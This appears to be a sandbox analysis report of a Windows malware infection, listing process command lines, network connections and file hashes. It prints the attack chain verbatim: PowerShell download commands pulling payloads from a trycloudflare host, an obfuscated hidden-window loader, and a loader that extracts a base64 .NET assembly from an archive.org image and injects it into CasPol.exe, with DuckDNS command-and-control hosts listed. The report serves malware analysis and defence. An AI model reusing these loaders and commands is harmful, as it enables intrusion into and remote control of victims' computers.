C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe c:\Users\Admin\Downloads\new.bat

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\new.bat""

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://flu-survival-educational-nba.trycloudflare.com/kbsfaw.pdf

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffe1cc83cb8,0x7ffe1cc83cc8,0x7ffe1cc83cd8

C:\Windows\system32\timeout.exe

timeout /t 5 REM Wait for PDF to open (adjust timeout as needed)

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "& { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'https://flu-survival-educational-nba.trycloudflare.com/DXJS.zip' -OutFile 'C:\Users\Admin\Downloads\DXJS.zip' }"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1860,17429188085956929424,5938882748271905795,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5980 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1860,17429188085956929424,5938882748271905795,131072 --lang=en-US --extension-process --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6404 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=ppapi --field-trial-handle=1860,17429188085956929424,5938882748271905795,131072 --lang=en-US --device-scale-factor=1 --ppapi-antialiased-text-enabled=1 --ppapi-subpixel-rendering-setting=1 --mojo-platform-channel-handle=5228 /prefetch:6

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1860,17429188085956929424,5938882748271905795,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6792 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1860,17429188085956929424,5938882748271905795,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6764 /prefetch:1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "& { Expand-Archive -Path 'C:\Users\Admin\Downloads\DXJS.zip' -DestinationPath 'C:\Users\Admin\Downloads' -Force }"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1860,17429188085956929424,5938882748271905795,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6888 /prefetch:8

C:\Windows\system32\timeout.exe

timeout /t 5 REM Wait for extraction to finish (adjust timeout as needed)

C:\Windows\system32\attrib.exe

attrib +h "C:\Users\Admin\Downloads\Python"

C:\Users\Admin\Downloads\Python\Python312\python.exe

python.exe money.py

C:\Windows\System32\notepad.exe

C:\Windows\System32\notepad.exe

C:\Users\Admin\Downloads\Python\Python312\python.exe

python.exe moment.py

C:\Windows\System32\notepad.exe

C:\Windows\System32\notepad.exe

C:\Users\Admin\Downloads\Python\Python312\python.exe

python.exe update.py

C:\Windows\System32\notepad.exe

C:\Windows\System32\notepad.exe

C:\Users\Admin\Downloads\Python\Python312\python.exe

python.exe upload.py

C:\Windows\System32\notepad.exe

C:\Windows\System32\notepad.exe

C:\Users\Admin\Downloads\Python\Python312\python.exe

python.exe time.py

C:\Windows\System32\notepad.exe

C:\Windows\System32\notepad.exe

C:\Users\Admin\Downloads\Python\Python312\python.exe

python.exe kam.py

C:\Windows\System32\notepad.exe

C:\Windows\System32\notepad.exe

C:\Users\Admin\Downloads\Python\Python312\python.exe

python.exe momentomo.py

C:\Windows\System32\notepad.exe

C:\Windows\System32\notepad.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://flu-survival-educational-nba.trycloudflare.com/kbsfaw.pdf

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x108,0x10c,0x110,0xe4,0x114,0x7ffe1cc83cb8,0x7ffe1cc83cc8,0x7ffe1cc83cd8

C:\Windows\system32\timeout.exe

timeout /t 5 REM Wait for PDF to open (adjust timeout as needed)

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1860,17429188085956929424,5938882748271905795,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4860 /prefetch:1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "& { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'https://flu-survival-educational-nba.trycloudflare.com/startupppp.bat' -OutFile 'C:\Users\Admin\Downloads\startupppp.bat' }"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "& { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'https://flu-survival-educational-nba.trycloudflare.com/FTSP.zip' -OutFile 'C:\Users\Admin\Downloads\FTSP.zip' }"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\dvfhxj.vbe"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\glbdqn.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\jrzlfk.vbs"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\xmwjze.cmd" "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -windowstyle hidden "cls;write 'Ordovian Talgsmelteris Klevarers Eurokous Accouterments Dimanganous Filao Inflectionally Brdgruppernes Riotise';$Mo = 1;Function Befaret($Kuldkaste){$Boghvedegrynenes=$Kuldkaste.Length-$Mo;$Fogramite101='SUBSTRIN';$Fogramite101+='G';For( $Stemningernes=2;$Stemningernes -lt $Boghvedegrynenes;$Stemningernes+=3){$Ordovian+=$Kuldkaste.$Fogramite101.Invoke( $Stemningernes, $Mo);}$Ordovian;}function Skriverkontor($Foresight){ & ($Advarselssignaler) ($Foresight);}$Ekspansionsbeholder=Befaret 'RaMSnoPez ii,al.ilMea S/ i5A...k0In O ( OW ,iU.nefd .oKuwStsFo EN tT . Ob1So0,a.Rk0S ;.o ,cWU.iCin A6Ch4 e;St FoxS,6Ma4D,; A mrChvSu:.o1I 2Sw1Uo.Li0Im)T, .GCae FcDikA,o B/ L2,u0O.1Wa0bu0Zi1Fe0,n1.r BF TiR rCie ,f,eoKox S/Ov1Sn2tr1Tr.w 0St ';$Fredspibers=Befaret ',lUCas BeSkru -M.ATrgEke.vnLstSk ';$Accouterments=Befaret 'AuhRetLutLopAusBe: B/ e/.unU.z OaInrReigra,o.P.oOerTagCi/Syt sr e/ .tPor UeS.l,yeAnm,deKnn.etreeMor ...epGrsTomFy ';$Overgenialness=Befaret 'De>He ';$Advarselssignaler=Befaret 'Tri Ae ixS, ';$Camuse='Inflectionally';$Administrationsbygningen = Befaret ',ieDecaehBoo U Cr%diaAtp.ap Md Sa tStaSy%S,\EpFUnaDev BuZes HeUnsFo1Sh4Py6S,.,kAS,a.urF Op&Re&An FoeYic h roC. EktKi ';Skriverkontor (Befaret 'Le$IlgNol AoEpbFiaHjlBk:UdFWieF rEpvfooE.u,lrT.lRke .s Us.e=Ps(frcM,mSndV, .e/ rc N E.$BeAPadF.m eiPrn aines it KrMuasktpli BoS.nKas,rbs,y ,g tnSiiUdnIngM eRanF.) M ');Skriverkontor (Befaret 'S $ FgAllBroApbJua,tlPe:S EDru,orKuo xkMioEvuFos y=mi$UnABacHyc.soDeuDatSteMarThmRaeAnnC.t.esRi. 
asL,pBelPaiPat.i(I.$BaO .vLeet.r hgR,eGen .iTia,alSnnine Cs s E)Sa ');Skriverkontor (Befaret ' P[I,NP.eFrtTi.m SApeunrNivCui ,cMye,nPSsod.i,dn DtHoMA.a,sn SaekgS,eF,r ] ,:F.:C,SGeePec,euPrr,niS tS,yEkP irBiolytIro AcHeo flSt .r= F [FoN SeSit U.VaSBieOvc BuPar i ,tEkyToPTrrDeoPotUboPhc No,ilVoT BySyp.eeA.]Sk:Di:.aTBelIdsHa1Ud2A, ');$Accouterments=$Eurokous[0];$Reattire= (Befaret 'Gu$Blg GlUnoF,b,naPulP,:F.AChd JdL eJur eiSunSigUne .nPes e= NSke UwPa- EOEpbU,jExe .cEntI, SpS DyHvs.dtCaeFim S.FoN mebatIo.,lWR,eUnbDiC .l SiFie UnUnt');$Reattire+=$Fervourless[1];Skriverkontor ($Reattire);Skriverkontor (Befaret ' P$MoADrdHedSyeCarudiGan DgK,eEnn Ps F.ArHSyeOdaUld eI r TsSn[Ep$PlFsor Pe rd lsSupBii.ubfoeRorChs,t] G=M $L E ,k ,sDrp.uaDinuns,aiAnoTenShsWob uePohDro ElFldS.eForSm ');$Nonreasoning131=Befaret 'Un$D.A DdNeddieCorLoi AnMig.peG.nTusOd. kD,oo iw,nnSylBroCoaApd DFD iFal eFe( ,$ SAR,c OcReoCouWitPreP.rIdm eB,n et SsM.,,i$ VI FmSpp Vr eoUdv RiOrs Ba etK,rS,i .cU eOp) F ';$Improvisatrice=$Fervourless[0];Skriverkontor (Befaret 'Ex$ g Pl.uoC,b saCalFo:KlG,arBua heA,nHes FeUdp.dr Io vSti .n,fsCh= p(AfT PeBusPot F-InPN.a At Sh,o Co$.eI,ymP.p .rUnoAsvHeiResA aArt rKoi cTeeSt)in ');while (!$Graenseprovins) {Skriverkontor (Befaret 'Co$UngKrl RoSubL.aUdl.k:NoFFoaScmOmiE,lSai .eR s C=sa$ChtInr SuMieAn ') ;Skriverkontor $Nonreasoning131;Skriverkontor (Befaret 'feS VtT aHerKltPl- BS,alV eS eI pPe .u4V, ');Skriverkontor (Befaret 'Fr$SkgHelscoShbKvaInlEb: ,Ga.rVeaLneStnA.s te PpmorAdoTovBei .nS.s M= A(HaT.ae Us,ltM -S.PBaaDetG h , P.$AfI ImBuph r o ovSmi us daRut OrSkiStc,ueMi)St ') ;Skriverkontor (Befaret ' .$ ,g lBuoRebS aStl I:.iKT loveD,v La .r ,eExr FsUn=Sm$Stgcal.hoVab aYmlNe:S TSaaFol ,gsesDamTie,clJ tIneMarMri RsA,+Da+ L%A $KoE muSkrdeoPek To .u,us O. oc eo ,u Vn ,tC, ') ;$Accouterments=$Eurokous[$Klevarers];}$Cinematographies=298843;$platyrhina=27531;Skriverkontor (Befaret 'M $ hg .l,eoSkbKia TlF,: eB er EdL gF,rPru.epStpFoe,vrF nKoeF.sAp T,=G. 
gGB,eDit p-klCEooAcnPrtKoe FnfatC. ,$ SISem,rpKar ro CvKuiCasSpa .t MrV iCocMae f ');Skriverkontor (Befaret 'Af$,yg.nlPsoDubBeaI.lBr:HeRClaubmTubPeuRetDiaStn.a Fl= L Bk[.yS UyTrs Ut,le .mGl.PuCNeoKyn,iv veS rGet e]V : N: IF.urSwos m mBLea rs .e C6 P4ScS BtW,r EiFonDhg S(K,$ pBDerytdUdg GrDeuN.pNipFoe rV,nGeeF sTh)Di ');Skriverkontor (Befaret 'Ho$PegOvlGeoGibTiaInlBa:hjS,otStyL nMaeAltBl1A.8op4Hj Fo= A S[ BS MyIns,at,eeRemIn.AuT AeInx Gt S. E,inIncBaoErdOpiChnReg ]Ep:Co: AG SSpC.rI.nII,.TiG .eSut,lSsktPlrIniThnGigKa(Gl$KuR vaRamFrb eu St Ca.on C)Gl ');Skriverkontor (Befaret 'P,$ .gHylT oAnbDea ,l l:Tav .a Bn,aaH,h ie SiFlmFu=Be$ArSCht Sy inLaeagt E1.i8 .4 E.Pesgnu b EsO,t,erE.i nC.g.e( T$LuC,liAtnHee TmDea HtU oWig rFoa epSchSkipseM.sOl,Br$Snp SlIra otDayCorRoh.ni,hn,naIn)fe ');Skriverkontor $vanaheim;"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe


C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Favuses146.Aar && echo t"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://ia803405.us.archive.org/16/items/new_image_202406/new_image.jpg', 'https://ia803405.us.archive.org/16/items/new_image_202406/new_image.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('RunPE.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.0008cmer/xm.qitrepxe//:sptth' , '1' , 'C:\ProgramData\' , 'embetesgar','CasPol',''))} }"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C copy *.vbs "C:\ProgramData\embetesgar.vbs"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "& { Expand-Archive -Path 'C:\Users\Admin\Downloads\FTSP.zip' -DestinationPath 'C:\Users\Admin\Downloads' -Force }"

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Windows\system32\attrib.exe

attrib +h "C:\Users\Admin\Downloads\Print"

C:\Windows\system32\OpenWith.exe

C:\Windows\system32\OpenWith.exe -Embedding

C:\Windows\system32\NOTEPAD.EXE

"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\glbdqn.vbs.txt

C:\Windows\system32\OpenWith.exe

C:\Windows\system32\OpenWith.exe -Embedding

C:\Windows\system32\NOTEPAD.EXE

"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\dvfhxj.vbe.txt

Network

Country Destination Domain Proto
US 8.8.8.8:53 5.242.123.52.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
N/A 224.0.0.251:5353 udp
NL 23.62.61.97:443 www.bing.com tcp
US 104.16.231.132:80 flu-survival-educational-nba.trycloudflare.com tcp
GB 104.86.110.107:443 tcp
NL 23.62.61.155:443 r.bing.com tcp
US 20.189.173.18:443 browser.pipe.aria.microsoft.com tcp
US 52.111.227.14:443 tcp
US 104.16.231.132:443 flu-survival-educational-nba.trycloudflare.com tcp
NL 23.63.101.153:80 apps.identrust.com tcp
US 104.16.231.132:443 flu-survival-educational-nba.trycloudflare.com tcp
US 12.202.180.114:7878 anachyyyyy.duckdns.org tcp
US 12.187.175.72:6745 welxwrm.duckdns.org tcp
US 12.187.175.72:8292 welxwrm.duckdns.org tcp
US 12.187.175.72:8520 welxwrm.duckdns.org tcp
US 12.187.175.72:9390 welxwrm.duckdns.org tcp
US 104.16.231.132:443 flu-survival-educational-nba.trycloudflare.com tcp
US 12.187.175.72:6757 welxwrm.duckdns.org tcp
US 12.221.146.138:9402 rem8000jun.duckdns.org tcp
US 104.20.3.235:443 pastebin.com tcp
GB 172.217.169.67:80 c.pki.goog tcp
US 172.67.187.200:443 paste.ee tcp
AU 185.184.154.17:443 nzaria.org tcp
US 207.241.232.195:443 ia803405.us.archive.org tcp
AU 185.184.154.17:443 nzaria.org tcp
CA 138.197.147.223:443 expertiq.mx tcp
US 12.221.146.138:8000 rem8000jun.duckdns.org tcp
NL 178.237.33.50:80 geoplugin.net tcp
AU 185.184.154.17:443 nzaria.org tcp

Files

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat


\??\pipe\LOCAL\crashpad_3884_QORKFFBBVTVJBGNG


C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat


C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences


C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT


C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State


C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences


C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences


C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences


C:\Users\Admin\Downloads\Unconfirmed 153799.crdownload


C:\Users\Admin\Downloads\new.bat:Zone.Identifier


C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index


C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 5028dcd15ae2f9870f79f5fc610cb347
SHA1 1c87188dc751a53c41fa85e8dca06c2a4e20542b
SHA256 20f2a860d440b0fa516cc4e34f40d7a0577a0f85759143aae07705a7292b6580
SHA512 282882338f2a47ce28eac040fd96cb559e8f1b0daf943401f80c8ee968e70a626b085eba64423cb94b01626b3b275133a15f33d032ac3a3c5de6a47bd36b0bc3

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

MD5 00a455d9d155394bfb4b52258c97c5e5
SHA1 2761d0c955353e1982a588a3df78f2744cfaa9df
SHA256 45a13c77403533b12fbeeeb580e1c32400ca17a32e15caa8c8e6a180ece27fed
SHA512 9553f8553332afbb1b4d5229bbf58aed7a51571ab45cbf01852b36c437811befcbc86f80ec422f222963fa7dabb04b0c9ae72e9d4ff2eeb1e58cde894fbe234f

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 f6c1e5b1533d2aeb694d862547cba3a0
SHA1 52fa5d028012ba3fc9f7fa611c7dcb558dd856e5
SHA256 04cb3729822400b11bca37b4177e152b9cc65e588401df4ff9b8661a2e1f19d1
SHA512 842b3fbf7d3d81a43d2f602b568b27255f8b5bedc6cb5bc088865bf559cb0ac702364f22d1d5d588811f03fad717f1d388a97901860ca4b70e17ba5088e0e60b

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_fxkdj5hg.nqm.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4836-177-0x00000218AFEA0000-0x00000218AFEC2000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 0d71271ff5f4c75346d756b0af3ba8d8
SHA1 cf2effedfd5eaacb5da4e349e861dffe1c0c3919
SHA256 0bb818a959dfb09457cb26f92f13f26803e21d34eae73428cedcce5abd813e1c
SHA512 3e8086ce2c4dab8f4511ad90165777e17ef13ad888fd1feb4056712891ee9f8a8d6c2e169395f2271afd652ec12fd1e857536ca30e725dfcabc8d4a395a89457

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 3838c3d8436b6da24ee9e27181542f09
SHA1 fba277e6cfef5d21a29a456ce86354c0dca8354e
SHA256 0f7f4192141cafef68b57cdc9963ffb64ed0008c890475c05d36bb7d27426840
SHA512 4e26978d56cb6757c1e0466f1df3b17ae7b66dba46f527fa8eb5c6d147485b1bf6468b9062ee11b0939262489f6e03335098d4586d69500f7bd92c84ec90fd05

C:\Users\Admin\Downloads\Unconfirmed 335134.crdownload

MD5 a4c51a56c6a7775f77fa4523a483e816
SHA1 587ec280308621693e9fad4d3c756ee52c8e8424
SHA256 0007854176e6ff9a44a52d7c8778479374a3e5744e88d6e50ac0a83ee042f0c4
SHA512 2bd7bb69c614c2c344cd2b586f0d5347b201c7ad3bb9502713ff78f68f12eeb2753240fd6ceca8751e71f67bc2696e8ee95067f47b7827965a08f5cfeaf33775

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 5f4c933102a824f41e258078e34165a7
SHA1 d2f9e997b2465d3ae7d91dad8d99b77a2332b6ee
SHA256 d69b7d84970cb04cd069299fd8aa9cef8394999588bead979104dc3cb743b4f2
SHA512 a7556b2be1a69dbc1f7ff4c1c25581a28cb885c7e1116632c535fee5facaa99067bcead8f02499980f1d999810157d0fc2f9e45c200dee7d379907ef98a6f034

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 12ff85d31d9e76455b77e6658cb06bf0
SHA1 45788e71d4a7fe9fd70b2c0e9494174b01f385eb
SHA256 1c60ff7821e36304d7b4bcdd351a10da3685e9376775d8599f6d6103b688a056
SHA512 fcc4084ab70e49821a3095eeac1ef85cf02c73fdb787047f9f6b345132f069c566581921fac98fab5ddec1a550c266304cce186e1d46957946b6f66dba764d2f

C:\Users\Admin\Downloads\startupppp.bat:Zone.Identifier

MD5 2ac3d67a8a9a6e3a4e9f8269fe1fd2f9
SHA1 bf6fabca8375b737a4529b913d8f82b0a358e288
SHA256 f51d3c2990c230f5b1b2ffff157aad899c614b41fbc9ecc8a40e7ca2f0a45b29
SHA512 eeba2b6e6b621d4b13e67153b8a1adb0f63af42cb89285931f3de7649ac62789e20ed0b99bd1844fc0da91fea2a4bf8abfa3d87f3e8a1bdce46574a8461fabfb

memory/4600-269-0x0000022EE9320000-0x0000022EE9332000-memory.dmp

memory/4600-270-0x0000022EE9180000-0x0000022EE918A000-memory.dmp

C:\Users\Admin\Downloads\DXJS.zip

MD5 db3308fdbf00de1b0b198f1d5a410c61
SHA1 e6d224b9077bc4bbb253ff5cf3c839ae42f2c98e
SHA256 6fe5d6bba7346c03ad4d1ce3e27f220aea097f35e692b7966dd4f8a6bd2731ac
SHA512 bd251c88c42c1f9734b166857a9550f9af36d55c4c5a714d3eb04233379c2aa4d518f9bf1eed64945e049c52679a256808251f33d9db2c03903e2608e90d4fc7

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 d53a85f1eb9548fa2e827020be3f68fa
SHA1 a60c4ae88e8b17c8b789abfffe301dcb77076bb2
SHA256 333e70962719de8f9b06bbe8516db51a0c34cac198f670d5f26fcfe1778bf82d
SHA512 e0b3b70d3ad48087a01ebcb804173ce46d16bbb25de2ccb3ed41d3ee7b9c7238ac247b5577235ec97ed847f4eb81e3b5e28e0cb32bc31dcf6c8e9cbf91ecc83b

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

MD5 f9f21866d112c6c76e09d2af1260a97a
SHA1 9b2f2f4cf683e9db3772033e81afa1d543e3c68f
SHA256 2b3300a2ceb9dc844a791730ce9a597e10e385af898a0f9dbda180b1419f9597
SHA512 38615f9b5910cfc1b6155702d9bbf48a5641bbbf0d7c15efdba01cfd76633d4255a6a054486326582c685deef7fc27d80b3ecae36a52a27542a83967ecaa7867

C:\Users\Admin\Downloads\Python\Python312\Lib\test\cjkencodings\shift_jis-utf8.txt

MD5 cc34bcc252d8014250b2fbc0a7880ead
SHA1 89a79425e089c311137adcdcf0a11dfa9d8a4e58
SHA256 a6bbfb8ecb911d13581f7713391f8c0ceea1edd41537fdb300bbb4d62dd72e9b
SHA512 c6fb4a793870993a9f1310ce59697397e5334dbb92031ab49a3ecc33c55e84737e626e815754c5ddbe7835b15d3817bf07d2b4c80ea5fd956792b4db96c18c2f

C:\Users\Admin\Downloads\Python\Python312\Lib\test\test_importlib\__init__.py

MD5 c3239b95575b0ad63408b8e633f9334d
SHA1 7dbb42dfa3ca934fb86b8e0e2268b6b793cbccdc
SHA256 6546a8ef1019da695edeca7c68103a1a8e746d88b89faf7d5297a60753fd1225
SHA512 5685131ad55f43ab73afccbef69652d03bb64e6135beb476bc987f316afe0198157507203b9846728bc7ea25bc88f040e7d2cb557c9480bac72f519d6ba90b25

C:\Users\Admin\Downloads\Python\Python312\Lib\test\test_importlib\builtin\__main__.py

MD5 47878c074f37661118db4f3525b2b6cb
SHA1 9671e2ef6e3d9fa96e7450bcee03300f8d395533
SHA256 b4dc0b48d375647bcfab52d235abf7968daf57b6bbdf325766f31ce7752d7216
SHA512 13c626ada191848c31321c74eb7f0f1fde5445a82d34282d69e2b086ba6b539d8632c82bba61ff52185f75fec2514dad66139309835e53f5b09a3c5a2ebecff5

C:\Users\Admin\Downloads\Python\Python312\Lib\test\test_importlib\resources\namespacedata01\binary.file

MD5 37b59afd592725f9305e484a5d7f5168
SHA1 a02a05b025b928c039cf1ae7e8ee04e7c190c0db
SHA256 054edec1d0211f624fed0cbca9d4f9400b0e491c43742af2c5b0abebf0c990d8
SHA512 4ec54b09e2b209ddb9a678522bb451740c513f488cb27a0883630718571745141920036aebdb78c0b4cd783a4a6eecc937a40c6104e427512d709a634b412f60

C:\Users\Admin\Downloads\Python\Python312\Lib\test\test_pydoc\__init__.py

MD5 4a7dba3770fec2986287b3c790e6ae46
SHA1 8c7a8f21c1bcdb542f4ce798ba7e97f61bee0ea0
SHA256 88db4157a69ee31f959dccbb6fbad3891ba32ad2467fe24858e36c6daccdba4d
SHA512 4596824f4c06b530ef378c88c7b4307b074f922e10e866a1c06d5a86356f88f1dad54c380791d5cfda470918235b6ead9514b49bc99c2371c1b14dc9b6453210

C:\Users\Admin\Downloads\Python\Python312\Scripts\pip3.12.exe

MD5 ece8006a0714b569546a3f789638a55a
SHA1 520ba56fd30bcf1e08eefb390d392905c3470936
SHA256 e9059568c5f1200915f581cf582da6465d68a4b558972c6b5e3501f4aa63de7b
SHA512 bb8926c7938da517104afab2f34c8dfc3bfb8c64241770b6e36f1170b87059d32e9b81b9b0451735718e62be123c27f6a053630c85e1b5b21ede6aca7062fe5c

C:\Users\Admin\Downloads\Python\Python312\python.exe

MD5 3d44212bba2d7a88d6c83ce8523bba88
SHA1 62ea5374c17b0f2f88f7d4a6c03b592393dba6f8
SHA256 15b41a488c356c0e331facdea6c836a6cec021f12d5fde9844e7ca4a1aa0361a
SHA512 89297f1fbe811b23a38fc3dbc22989dfb9faf97960c65f1f0f43be710204b32f41f33ef0bb893815db71c4462d04b52f686b40801f6d4cbd8e529d740618ac67

C:\Users\Admin\Downloads\Python\Python312\python312.dll

MD5 3c388ce47c0d9117d2a50b3fa5ac981d
SHA1 038484ff7460d03d1d36c23f0de4874cbaea2c48
